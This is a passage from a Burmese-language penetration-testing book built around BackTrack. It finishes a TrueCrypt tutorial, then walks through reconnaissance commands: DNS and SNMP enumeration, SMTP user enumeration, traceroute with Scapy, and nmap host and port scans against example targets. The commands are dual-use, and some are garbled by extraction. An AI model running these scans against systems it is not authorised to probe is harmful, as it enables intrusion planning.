၄။ Defualt Option အတိုင္းသာထားမည္ျဖစ္ၿပီး Next တြင္ Click ႏိွပ္ပါ။

၅။ Standard TrueCrypt Volume ကိုေရြးခ်ယ္ကာ Next တြင္ Click ႏိွပ္ပါ။

46 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ Select File… ဟူေသာ ခလုတ္တြင္ Click ႏိွပ္ရမည္ျဖစ္ၿပီး ထိုမွ TrueCrypt Volume အသစ္၏ Name
ႏွင့္ Location ကို သတ္မွတ္ေပးရပါမည္။ ထို႕ေနာက္ ၿပီးဆံုးေသာအခါတြင္ Save တြင္ Click ႏိွပ္ပါ။

၇။ Next တြင္ Click ႏိွပ္ပါ။ ထို႕ေနာက္ အသံုးျပဳလိုေသာ Encryption ႏွင့္ Hash Algorithm တို႕ကို
ေရြးခ်ယ္ပါ။

၈။ ထို႕ေနာက္ ထပ္မံေပၚလာေသာ Screen တြင္ Container အတြက္ လိုအပ္ေသာ Space ပမာဏကို


သတ္မွတ္ေပးရပါမည္။

၉။ ထို႕ေနာက္ သတ္မွတ္ထားေသာ Volume အတြက္ Password ကိုရိုက္ထည္႕ေပးရပါမည္။ ထို႕ေနာက္


Next တြင္ Click ႏိွပ္ပါ။

၁၀။ Filesystem အမ်ိဳးအစားကိုေရြးခ်ယ္ေပးရပါမည္။

၁၁။ လိုအပ္ခ်က္အေပၚမူတည္၍ Cross-platform ေထာက္ပံ့မႈကိုသတ္မွတ္ေပးရပါမည္။

၁၂။ ေနာက္ထပ္ေပၚလာေသာ Screen တြင္ Format ခလုတ္ကို Click ႏိွပ္ေပးရပါမည္။

၁၃။ Format ျပဳလုပ္ျခင္း စတင္မည္ျဖစ္ၿပီး TrueCrypt Volume တစ္ခုကို ေအာင္ျမင္စြာတည္ေဆာက္ၿပီး


ျဖစ္ပါသည္။ ထိ႕ု ေနာက္ OK ကို Click ႏိွပ္ပါ။ ထပ္မံေပၚလာေသာ Screen မွ Exit တြင္ Click ႏိွပ္ပါ။

၁၄။ ထို႕ေနာက္တြင္ TrueCrypt Window သို႕ျပန္လည္ေရာက္ရိွသြားမည္ျဖစ္ပါသည္။

၁၅။ ထုိ Encrypt ျပဳလုပ္ထားေသာ Volume ကို Decrypt ျပဳလုပ္ရန္အတြက္ List မွ Slot တစ္ခုကို
ေရြးခ်ယ္ေပးပါ။ ထို႕ေနာက္ Select File… တြင္ Click ႏိွပ္ကာ Encrypt ျပဳလုပ္ထားေသာ volume ကို
ဖြင့္ႏိုင္မည္ျဖစ္ပါသည္။

၁၆။ Mount ခလုတ္တြင္ Click ႏိွပ္ၿပီး ေပးထားခဲ့ေသာ Password ကိုရိုက္ထည္႕ေပးပါ။ ၿပီးဆံုးေသာအခါ


တြင္ OK တြင္ click ႏိွပ္ေပးပါ။

မ်က္ပြင့္စာေပ 47
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၇။ ထို႕ေနာက္တြင္ Volume ကိ၀


ု င္ေရာက္ႏိုင္ရန္အတြက္ Slot ေပၚတြင္ Double Click ျပဳလုပ္ရံုသာ
ျဖစ္ပါသည္။ အသံုးျပဳမႈၿပီးဆံုးေသာအခါတြင္ Dismount All တြင္ Click ႏိွပ္ေပးပါ။

အလုပ္လုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕လွ်င္ Protected volume တစ္ခုကို ျပဳလုပ္ရန္ Truecrypt ကို set


up ျပဳလုပ္ကာ Mount လည္းျပဳလုပ္ခဲ့ပါသည္။ ၄င္းသည္ Data မ်ားကို သိမ္းဆည္းသည္႕အခါ မ်က္ျမင္
မေတြ႕ရေစရန္ ျပဳလုပ္ေပးသည္႕ အသံုး၀င္သည္႕ Tool တစ္ခုလည္းျဖစ္ပါသည္။

48 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Chapter 3

Information Gathering
အခ်က္အလက္ စုေဆာင္းျခင္း

မ်က္ပြင့္စာေပ 49
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Introduction
အျခားေသာထိုးေဖာက္မႈလုပ္ငန္းစဥ္မ်ားကို မလုပ္ေဆာင္မီ အေရးႀကီးေသာ လုပ္ေဆာင္ခ်က္တစ္ရပ္မွာ
အခ်က္အလက္မ်ားစုေဆာင္းျခင္းပင္ျဖစ္သည္။ ထိုးေဖာက္မ၀င္ေရာက္မီတြင္ လိုအပ္ေသာ တိုက္ခိုက္မည္႕
Target အတြက္ အေျခခံအခ်က္အလက္မ်ားကိုစုေဆာင္းျခင္းလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ရ မည္ျဖစ္သည္။
အခ်က္အလက္မ်ား ပိုမိုစုေဆာင္းမိေလေလ ထိုးေဖာက္၀င္ေရာက္သည္႕အခါတြင္ ပိုမိုလြယ္ကူေလေလ
ျဖစ္သည္႕အတြက္ အခ်က္အလက္မ်ားကိုစုေဆာင္းျခင္းအေလ့အထကိုေလ့က်င့္ေပးရန္လိုအပ္လွပါသည္။
ယခုအခန္းတြင္ေလ့လာရမည္႕ အေၾကာင္းအရာမ်ားမွာ

- Service enumeration
- Determining the network range
- Identifying active mahcines
- Finding open ports
- Operating system fingerprinting
- Service fingerprinting
- Threat assessment with Maltego
- Mappin the network တို႕ျဖစ္ပါသည္။ အထက္တြင္ေဖာ္ျပထားေသာေခါင္းစဥ္ခြဲမ်ားကို အေသးစိပ္
ေဖာ္ျပေပးထားပါသည္။

Service enumeration
ယခုအပိုင္းတြင္ Service enumeration tricks မ်ားစြာကိုလုပ္ေဆာင္ၾကည္႕ၾကမည္ျဖစ္ပါသည္။
Enumeration ဆိုသည္မွာလုပ္ေဆာင္ခ်က္တစ္ခုျဖစ္ၿပီး ၄င္းလုပ္ေဆာင္ခ်က္သည္ ကြန္ယက္တစ္ခုမွ
အခ်က္အလက္မ်ားကို စုေဆာင္းျခင္းျဖစ္သည္။ ယခုအပိုင္းတြင္ DNS enumeration ႏွင့္ SNMP
enumeration အေၾကာင္းကိုဥပမာေပး၍ ေဖာ္ျပေပးမည္ျဖစ္သည္။ DNS enumartion ဆိုသည္မွာလည္း
လုပ္ေဆာင္ခ်က္တစ္ခုပင္ျဖစ္ၿပီး အားလံုးေသာ DNS Server မ်ားႏွင့္ Organization တစ္ခုအတြက္ DNS
entries မ်ားကို Locating ျပဳလုပ္ေပးႏိုင္သည္။ DNS enumeration သည္ အဖြ႕ဲ အစည္းတစ္ခု၏

50 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Usernames, computer names, IP addresses ႏွင့္အျခားေသာ critical information မ်ားကို


စုေဆာင္းႏိုင္ရန္အတြက္ခြင့္ျပဳေပးသည္။ ထိုသို႕ေသာအလုပ္မ်ားကို လုပ္ေဆာင္ႏိုင္ရန္အတြက္ DNSenum
ကိုအသံုးျပဳရပါမည္။ SNMP enumeration အတြက္ SnmpEnum ဆိုေသာ tool တစ္ခုကို အသံုးျပဳႏိုင္
ပါသည္။ SnmpEnum သည္ စြမ္းအားျမင့္ SNMP enumeration tool ျဖစ္ၿပီး ကြန္ယက္တစ္ခုေပၚမွ SNMP
traffic ကိုချြဲ ခမ္းစိပ္ျဖာရန္အတြက္ အသံုးျပဳႏိုင္သည္။

ဆက္လက္ၿပီး DNS enumeration ျပဳလုပ္ျခင္းကိုစတင္ေလ့လာၾကည္႕ၾကမည္ျဖစ္သည္။

၁။ DNS enumeration အတြက္ DNSenum ကိုအသံုးျပဳရပါမည္။ DNS enumeration တစ္ခုကို စတင္ရန္


အတြက္ Gnome Interface ၏ Terminal ကိုဖြင့္၍ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

cd /pentest/enumeration/dns/dnsenum/./dnsenum.pl –enum adomainnameotheinternet


.com

မွတ္ရန္။ ။ယခုေဖာ္ျပပါ Tool ကို Public website တြင္အသံုးမျပဳသင့္ပါ။ ကိုယ္ပိုင္မဟုတ္ေသာ


မည္သည္႕ Website, မည္သည္႕ Server တြင္မွ မစမ္းသပ္သင့္ပါ။ အထက္ပါ Command မွ adomain-
nameontheinternet.com သည္ ဥပမာအေနျဖင့္ ေဖာ္ျပထားျခင္းသာျဖစ္ၿပီး တိုက္ခိုက္မည္႕ Target ကို
အစားထိုးသံုးစြရ
ဲ ပါမည္။ သတိၿပဳပါ။

၂။ ေအာက္တြင္ေဖာ္ျပထားသည္႕ပံုအတိုင္း Host, Name Server, Mail Server ႏွင့္ ကံေကာင္းခဲ့လွ်င္


Zone Transfer အထိ Information မ်ားကို Output အျဖစ္ရရိွႏိုင္မည္ျဖစ္သည္။

မ်က္ပြင့္စာေပ 51
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ၄င္းတြင္ အပိုပါ၀င္ေသာ Option မ်ားစြာပါ၀င္ၿပီး ၄င္းတို႕ကိုအသံုးျပဳ၍ DNSenum ကိုအသံုးျပဳႏိုင္ပါ


သည္။ ၄င္းတို႕မွာေအာက္ပါအတိုင္းျဖစ္ပါသည္။

 -- threads [number] အဆိုပါ Option သည္ တစ္ႀကိမ္တည္းတြင္ Processes မည္မွ်ကို


ေမာင္းႏွင္ႏိုင္သည္ကို သတ္မွတ္ေပးႏိုင္သည္။
 -r အဆိုပါ Option သည္ Recursive lookups ကို enable ျပဳလုပ္ေပးသည္။
 -d သည္ WHOIS request မ်ားအၾကားတြင္ Second ျဖင့္သတ္မွတ္ထားေသာ Delay Time ကို
သတ္မွတ္ေပးႏိုင္သည္။
 -o သည္ output location မ်ားကိုသတ္မွတ္ရန္အတြက္ အသံုးျပဳႏိုင္ပါသည္။
 -w သည္ WHOIS queries မ်ားကို Enable ျပဳလုပ္ေပးႏိုင္ပါသည္။

၄။ SNMP enumeration ကိုစတင္ႏိုင္ရန္အတြက္ SNMPenum ကို Terminal တြင္ ေအာက္ပါ Command


မ်ားကို ရိုက္ထည္႕ျခင္းျဖင့္ စတင္အသံုးျပဳႏိုင္ပါသည္။

cd /pentest/enumeration/snmp/snmpenum

perl snmpenum.pl 192.168.10.200 public windows.txt

၅။ ယခုဥပမာတြင္ ကၽြန္ေတာ္တို႕သည္ host 192.168.10.200 ကိုတိုက္ခိုက္မည္ျဖစ္ၿပီး အကယ္၍ device


သည္ SNMP ကို Enable ျပဳလုပ္ထားလွ်င္ႏွင့္ ရရိွထားေသာ အခ်က္အလက္မ်ားကို Active ျပဳလုပ္
ထားမိလွ်င္ ေအာက္ပါအခ်က္အလက္မ်ားပါ၀င္ႏိုင္ပါသည္။

 Installed Software
 Users
 Uptime
 Hostname
 Discs
 Running Processes, ႏွင့္အျခားေသာ အခ်က္အလက္မ်ား ျဖစ္ႏိုင္ပါသည္။

ထို႕ေၾကာင့္ နဂိုမူလ Command ပံုစံမွာ

52 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Perl snmpenum.pl [ip address to attack] [community] [config file]

၆။ အျခားေသာ Command ကိုအသံုးျပဳျခင္းျဖင့္ Window host သည္ snmpwalk ျဖစ္၊ မျဖစ္ကို စစ္ေဆးရန္
အသံုးျပဳႏိုင္ပါသည္။ Snmpwalk သည္ SNMP application တစ္ခုျဖစ္ၿပီး ၄င္းသည္ SNMP GETNEXT
request အတြက္ ကြန္ယက္တစ္ခုလံုး၏ Information Tree ကို Query လုပ္ရန္အတြက္ အသံုးျပဳႏိုင္သည္။
ထိုသို႕ျပဳလုပ္ရန္အတြက္ Command line မွ ေအာက္ပါ Command ကိုအသံုးျပဳႏိုင္ပါ သည္။

snmpwalk –c public 192.168.10.200 –v 2c

၇။ ထို႕အျပင္ Installed ျပဳလုပ္ထားေသာ Software အားလည္း enumerate ျပဳလုပ္ႏိုင္ေပသည္။

snmpwalk –c public 192.168.10.200 –v 1 | grep hrSWInstalledName

HOST-RESOURCES-MIB: :hrSWInstalledName.1=STRING: “WMwareTools”

HOST-RESOURCES-MIB: :hrSWInstalledName.2=STRING: “WebFldrs”

၈။ တူညီေသာ Tool မ်ားကိုအသံုးျပဳ၍လည္း ပြင့္ေနေသာ TCP Port မ်ားကိုလည္း enumerate ျပဳလုပ္ႏိုင္


ပါသည္။

snmpwalk –c public 192.168.10.200 –v 1 | grep tcpConnState | cut –d”.” –f6 | sort –nu

21

25

80

443

၉။ SNMP protocol မွ အခ်က္အလက္မ်ားကိုရရိွႏိုင္ေသာ အျခား utility တစ္ခုမွာ snmpcheck ျဖစ္ပါ


သည္။

cd /pentest/enumeration/snmp/snmpcheck/

perl snmpcheck.pl –t 192.168.10.200

မ်က္ပြင့္စာေပ 53
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ fierce (target မွ အားလံုးေသာ IP address မ်ားႏွင့္ Hostnames မ်ားကိုရွာေဖြရန္အတြက္


နည္းလမ္းအမ်ားအျပားကိုအသံုးျပဳေသာ Tool) ျဖင့္ Domain Scan ျပဳလုပ္ရန္ ေအာက္ပါ Command
မ်ားကိုအသံုးျပဳႏိုင္ပါသည္။

cd/ pentest/enumeration/dns/fierce/

perl fierce.pl –dns adomainnameontheinternet.com

မွတ္ရန္။ ။ ယခုေဖာ္ျပပါ Tool မ်ားကို ကိုယ္ပိုင္မဟုတ္ေသာ Website မ်ား Server မ်ားကို


တိုက္ခိုက္ရန္ ရည္ရြယ္ခ်က္ျဖင့္ အသံုးမျပဳသင့္ပါ။ adomainnameontheinternetw.com သည္ ဥပမာျပ
ထားျခင္းသာျဖစ္ၿပီး တိုက္ခိုက္လိုေသာ Target ကိုအစားထိုးအသံုးျပဳရပါမည္။ သတိထားသံုးစြၾဲ ကပါရန္

၁၁။ တူညီေသာလုပ္ေဆာင္ခ်က္ျဖစ္ေသာ္လည္း Supplied Word list ကိုအသံုးျပဳရန္အတြက္ ေအာက္ပါ


Command မ်ားကိုအသံုးျပဳသင့္ပါသည္။

perl fierce.pl –dns adomainnameontheinternet.com –wordlisthosts.txt –file /tmp/output.


txt

၁၂။ SMTP server ေပၚမွ User မ်ားမွ SMTS enumeration ကိုစတင္ရန္အတြက္ ေအာက္ပါ Command
ကိုအသံုးျပဳရပါသည္။

smtp –user –enum.pl –M VRFY –U /tmp/users.txt –t 192.168.10.200

၁၃။ ရရိွလာေသာ အေျဖမ်ားအရ ၄င္းတိ႕ု ကို Document ျပဳလုပ္ရန္ ဆက္လက္ေဆာင္ရြက္ႏိုင္ပါသည္။

Determining the network range


ယခင္အပိုင္းတြင္ေဖာ္ျပထားေသာအပိုင္းကို ျပဳလုပ္ျခင္းျဖင့္ ရရိွလာေသာအခ်က္အလက္မ်ားအရ ယခု
အပိုင္းတြင္ Target Network မွ အသံုးျပဳေသာ IP Address မ်ား၏ Range ကို ဆံုးျဖတ္ရန္ ျပဳလုပ္ရသည္႕
လုပ္ေဆာင္ခ်က္မ်ားကို ေဖာ္ျပေပးမည္ျဖစ္ပါသည္။ ထို႕ေၾကာင့္ ယခုအပိုင္းတြင္ ေဖာ္ျပပါသင္ခန္းစာမ်ားကို
ေလ့လာရမည္ျဖစ္ပါသည္။

54 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

အဆိုပါအတိုင္း Network Range ကိုတိုင္းတာရန္အတြက္ Terminal Windows ကိုဖြင့္၍ ေအာက္တြင္


ေဖာ္ျပထားသည္႕အတိုင္း အဆင့္အလိုက္ လုပ္ကိုင္ေဆာင္ရြက္ရပါမည္။

၁။ Terminal Windows အသစ္တစ္ခုဖြင့္၍ ေအာက္ပါ Command ကိုရိုက္ထည္႕ပါ။

dmitry –wnspb targethost.com –o /root/Desktop/dmitry-result

၂။ ထို႕ေနာက္ ၿပီးဆံုးသြားေသာအခါတြင္ Desktop ေပၚတြင္ dmitry-result.txt ဖိုင္တစ္ဖိုင္ကိုေတြ႕ရမည္


ျဖစ္ၿပီး ထိုဖိုင္ထဲတြင္ Target မွ အခ်က္အလက္မ်ားပါ၀င္ေသာ အေၾကာင္းအရာမ်ားကို ၄င္းဖိုင္တြင္ ေတြ႕ရ
မည္ျဖစ္သည္။

၃။ ICMP netmask request ကို issue လုပ္ရန္ ေအာက္ပါ Command ကိုအသံုးျပဳရပါမည္။

netmask –s targethost.com

၄။ Scapy ကိုအသံုးျပဳျခင္းျဖင့္ Multiparallel tackeroute လုပ္ငန္းစဥ္ကိုလုပ္ေဆာင္ႏိုင္ပါသည္။ စတင္ရန္


အတြက္ ေဖာ္ျပပါ Command ကိုအသံုးျပဳရပါမည္။

scapy

၅။ Scapy စတင္လာသည္႕အခါတြင္ ေအာက္တြင္ေဖာ္ျပထားေသာ Function ကိုအသံုးျပဳရပါမည္။

မ်က္ပြင့္စာေပ 55
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ans, unans=sr(IP(dat=www.targethost.com/30, ttl=(1,6))/TCP())

၆။ Table ေပၚတြင္ အေျဖကိုေဖာ္ျပရန္အတြက္ ေအာက္ပါ Function ကိုအသံုးျပဳရပါမည္။

ans.make_table ( lambda (s,r): (s.dst, s.ttl, r.src))

ထိုအခါ Output သည္ ေအာက္တြင္ေဖာ္ျပထားသည္႕အတိုင္း ေပၚလာမည္ျဖစ္ပါသည္။

216.27.130.162 216.27.130.163 216.27.130.164 216.27.130.165


1 192.168.10.1 192.168.10.1 192.168.10.1 192.168.10.1
2 51.37.219.254 51.37.219.254 51.37.219.254 51.37.219.254
3 223.243.4.254 223.243.4.254 223.243.4.254 223.243.4.254
4 223.243.2.6 223.243.2.6 223.243.2.6 223.243.2.6
5 192.251.254.1 192.251.251.80 192.251.254.1 192.251.251.80

၇။ Scapy ကိုအသံုးျပဳ၍ TPC traceoute ကိုရရိွႏိုင္ရန္ ေအာက္ပါ Function ကိုအသံုးျပဳရပါမည္။

res,unans=traceroute(["www.google.com","www.backtrack-
linux.org","www.targethost.com"],dport=[80,443],maxttl=20, retry=-2)

၈။ ေအာက္တြင္ေဖာ္ျပထားသည္႕ပံုအတိုင္း Graph ျဖင့္ ေဖာ္ျပရန္အတြက္ ေအာက္ပါ function


ကိ္ုအသံုးျပဳႏိုင္ပါသည္။

res.graph()

၉။ အဆိုပါ Graph ကို Save လုပ္သိမ္းဆည္းရန္အတြက္ ေအာက္ပါ Function ကိုအသံုးျပဳပါ။

res.graph(target="> /tmp/graph.svg")

၁၀။ 3D ျဖင့္ေဖာ္ျပသည္႕ Graph ပံုစံကိုလည္း ေအာက္ပါ Function ကိုအသံုးျပဳျခင္းျဖင့္ ရရိွႏိုင္ပါသည္။

56 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

res.trace3D()

၁၁။ Scapy မွ ထြက္ရန္အတြက္ ေအာက္ပါ Function ကိုအသံုးျပဳရပါမည္။

Exit ()

၁၂။ အထက္ပါလုပ္ေဆာင္ခ်က္မ်ားမွ Result မ်ားကိုစုေဆာင္း၍ ေနာက္တစ္ဆင့္ အလုပ္လုပ္ေဆာင္ရာ


တြင္ဆက္လက္အသံုးျပဳရမည္ျဖစ္ပါသည္။

အထက္ပါလုပ္ေဆာင္ခ်က္မ်ားမွ အလုပ္လုပ္ေဆာင္မႈမ်ားကိုေလ့လာၾကည္႕လွ်င္

အဆင့္ ၁ တြင္ Dmitry ကိုအသံုးျပဳ၍ Target မွ Information မ်ားကိုရယူျခင္းကို ေတြ႕ရမည္ျဖစ္သည္။


Option တစ္ခုျဖစ္ေသာ -wnspb ကိုအသံုးျပဳ၍ Domain Name မွ WHOIS lookup ကုိလုပ္ေဆာင္သြား
ျခင္းကိုေတြ႕ရပါမည္။ ထို႕အျပင္ Netcraft.com မွ Information မ်ားကို ရယူသြားျခင္းကို အျခားေသာ
ျဖစ္ႏိုင္ဖြယ္ရာ Subdmain မ်ား TCP Port Scan လုပ္ျခင္းမ်ားႏွင့္ လုပ္ေဆာင္သြားျခင္းမ်ားကိုလည္း
ေတြ႕ျမင္ရပါမည္။ Option တစ္ခုျဖစ္ေသာ -o ကိုအသံုးျပဳျခင္းျဖင့္ Text Document ဖိုင္တစ္ခုျဖင့္ အေျဖ
မ်ားကို သိမ္းဆည္းျခင္းကိုလည္း ေတြ႕ျမင္ခဲ့ရမည္ျဖစ္သည္။ အဆင့္ ၃ အရ ရိုးရွင္ေးသာ ICMP netmask
request တစ္ခုကို -s option ကိုအသံုးျပဳ၍ IP Address ႏွင့္ Netmask မ်ားရယူရန္အတြက္
တည္ေဆာက္သြားပံုကိုလည္း ျမင္ေတြ႕ရမည္ျဖစ္သည္။ ထို႕ေနာက္ Scapy ကိုအသံုးျပဳကာ Multiparallel
traceroute ကို Target Host တြင္အသံုးျပဳျပသြားပံုကိုလည္း ျမင္ေတြ႕ရမည္ျဖစ္သည္။ အေျခကိုလည္း
ဇယားျဖင့္ထြက္ေပၚလာေစရန္ function သံုးစြသ
ဲ ြားျခင္းကိုလည္း ေလ့လာခဲ့ရပါမည္။ အဆင့္ ၇ တြင္
အမ်ိဳးမ်ိဳးေသာ Host မ်ားအတြက္ TCP traceroute ကို port 80 ႏွင့္ 443 တို႕အတြက္
လုပ္ေဆာင္သြားျခင္းကိုလည္း ေတြ႕ရမည္ျဖစ္ပါသည္။ ရရိွလာေသာအေျဖမ်ားကိုလည္း Graph ျဖင့္ေဖာ္ျပ၍
သိမ္းဆည္းျခင္းလုပ္ငန္းစဥ္ကိုလည္း ေလ့လာခဲ့ရပါသည္။ ထို႕အျပင္ 3D Graph အသံုးျပဳပံုကုိ လည္း
ေလ့လာ၍ေနာက္ဆံုးတြင္ Scapy ပိတ္ျခင္းအထိ အေသးစိပ္ေဖာ္ျပထားခဲ့ပါသည္။

မ်က္ပြင့္စာေပ 57
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Indentifying active machines


Pentest တစ္ခုကို စမ္းသပ္ျခင္းမျပဳမီတြင္ Target Network Range ေပၚမွ active ျဖစ္ေနေသာ Machine
မ်ားကို Identify ျပဳလုပ္ရန္ လိုအပ္ပါမည္။

ရိုးရွင္းေသာနည္းလမ္းမွာ Target Network တြင္ Ping ေခၚၾကည္႕ျခင္းျဖစ္ပါသည္။ ထို႕ေၾကာင့္ လုပ္ေဆာင္


ခ်က္မ်ားကို ေအာက္တြင္အဆင့္အလိုက္ေလ့လာၾကည္႕ၾကပါမည္။

ေရွးဥိးစြာ Terminal Windows ကိုဖြင့္ကာ အဆင့္အလိုက္ Command မ်ားကိုလုပ္ကိုင္ေဆာင္ရြက္ရပါ


မည္။

၁။ Nmap ကိုအသံုးျပဳ၍ Host တစ္ခုသည္ အသက္၀င္ေနျခင္း ရိွ၊မရိွကို ေအာက္ပါ Command ျဖင့္


စစ္ေဆးၾကည္႕ရပါမည္။

nmap -sP 216.27.130.162

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-04-27 23:30 CDT


Nmap scan report for test-target.net (216.27.130.162)
Host is up (0.00058s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds

၂။ Nping (Nmap suite) ကိုအသံုးျပဳျခင္းျဖင့္လည္း အေသးစိပ္အခ်က္အလက္မ်ားကို ေအာက္တြင္


ေဖာ္ျပထားေသာ ပံုအတိုင္း ေတြ႕ရိွႏိုင္ပါသည္။

nping --echo-client “public” echo.nmap.org

58 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ ထို႕ေနာက္ Specified ျပဳလုပ္ထားေသာ Port အတြက္ Hex Data မ်ားကို ပို႕လႊတ္နိုင္ပါသည္။

nping -tcp -p 445 –data AF56A43D 216.27.130.162

Finding Open Ports


Network Range စစ္ေဆးျခင္းကိုအနည္းငယ္ ဗဟုသုဓရရိွေစရန္ ေဖာ္ျပၿပီးေနာက္္ ေနာက္အပိုင္းတစ္ခုျဖစ္
ေသာ ပြင့္ေနေသာ Port မ်ားကိုရွာေဖြျခင္း (Finding Open Ports) အေၾကာင္းကိုေဖာ္ျပေပးမည္ျဖစ္သည္။
ထိုသို႕ရွာေဖြရာတြင္ TCP ႏွင့္ UDP Port မ်ားသာမက Access Points မ်ားလည္းပါ၀င္ပါသည္။
ယခုအပိုင္းကို စတင္ရန္အတြက္ Apache Server ကို Start ျပဳလုပ္ထားရပါမည္။ ထိုသို႕ျပဳလုပ္ျခင္းကို
အေစာပိုင္း အခန္းမ်ားတြင္ ေဖာ္ျပထားခဲ့ၿပီး ျဖစ္သည္။ ထို႕ေၾကာင့္ လုပ္ေဆာင္ခ်က္မ်ားကို အဆင့္အလိုက္
ေလ့လာၾကည္႕ၾကပါမည္။

၁။ Terminal Window ကိုဖြင့္၍ ေအာက္ပါ command ကိုရိုက္ထည္႕ျခင္းျဖင့္ စတင္ၾကမည္ျဖစ္သည္။

nmap 192.168.56.102

မ်က္ပြင့္စာေပ 59
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Ports မ်ားကို စတင္စစ္ေဆးၾကည္႕မည္ျဖစ္ေသာေၾကာင့္ ေအာက္ပါ command ကိုအသံုးျပဳရပါမည္။


(စစ္ေဆးႏိုင္ေသာ Port ေပါင္း တစ္ေထာင္ခန္႕ရိွပါသည္။)

nmap –p 1 -1000 192.168.56.102

၃။ သို႕မဟုတ္ သတ္မွတ္ထားေသာ Port တစ္ခုတည္းကိုသာ ေအာက္ပါအတိုင္း စစ္ေဆးႏိုင္ပါသည္။

nmap –p 22 192.168.56.*

60 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၄။ ရရိွလာမည္႕ အေျဖကိုလည္း txt ဖိုင္တစ္ဖိုင္တြင္ယခုကဲ့သို႕ သိမ္းဆည္းထားခိုင္းေစႏိုင္ပါသည္။

Nmap –p 22 192.168.10.* -oG /tmp/nmap-targethost –tcp22.txt

အထက္တြင္ေဖာ္ျပထားေသာသင္ခန္းစာအရ အလုပ္လုပ္ေဆာင္ပံုမွာ Nmap ကုိအသံုးျပဳျခင္းျဖစ္ၿပီး


ကြန္ယက္တစ္ခုအတြင္းတြင္ ပြင့္ေနေသာ Port မ်ားကို စစ္ေဆးၾကည္႕ရွဳျခင္းပင္ျဖစ္ပါသည္။

Nmap ၏ GUI Version တစ္ခုျဖစ္ေသာ Zenmap ကိုလည္းအသံုးျပဳႏိုင္ပါသည္။ ထိုသို႕အသံုးျပဳ ရန္


အတြက္ Terminal တြင္ Command ရိုက္ထည္႕ျခင္းျဖင့္ျဖစ္ေစ၊ သို႕မဟုတ္ Application> BackTrack>
Information Gathering> Network Analysis> Network Scanners> Zenmap အထိ အဆင့္ဆင့္
သြားေရာက္၍လည္း ေမာင္းႏွင္ႏိုင္ပါသည္။

လုပ္ေဆာင္ခ်က္မ်ားမွာ လြယ္ကူေသာေၾကာင့္ မေဖာ္ျပေတာ့ပါ။ Zenmap အေၾကာင္းကို ပထမစာအုပ္ျဖစ္


ေသာ Hacker မ်ား၏ထိုးေဖာက္နည္းစာအုပ္တြင္လည္း ေဖာ္ျပထားခဲ့ၿပီးျဖစ္ပါသည္။

မ်က္ပြင့္စာေပ 61
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

Operatign System Fingerprinting


Information စုေဆာင္းျခင္းလုပ္ငန္းစဥ္တြင္ IP Address စာရင္းမ်ား၊ ပါ၀င္ေသာ ကြန္ပ်ဴတာမ်ားႏွင့္
ပြင့္ေနေသာ Port မ်ားကိုလည္း ထိုးေဖာက္မည္႕ စနစ္မ်ားအတြက္ရွာေဖြရန္ လိုအပ္ေၾကာင္း ေဖာ္ျပခဲ့ၿပီး
ျဖစ္ပါသည္။ ေနာက္တစ္ဆင့္အရ ပါ၀င္ေသာကြန္ပ်ဴတာမ်ားတြင္ ေမာင္းႏွင္ထားရိွေသာ Operating
System ကိုသိရိွရန္လိုအပ္ပါမည္။ ထိုသို႕ ေမာင္းႏွင္ထားေသာ Operating System မ်ားကို သိရိွႏိုင္ေစရန္
လိုအပ္ေသာ လုပ္ေဆာင္ခ်က္မ်ားကို ေဖာ္ျပေပးမည္ျဖစ္ပါသည္။

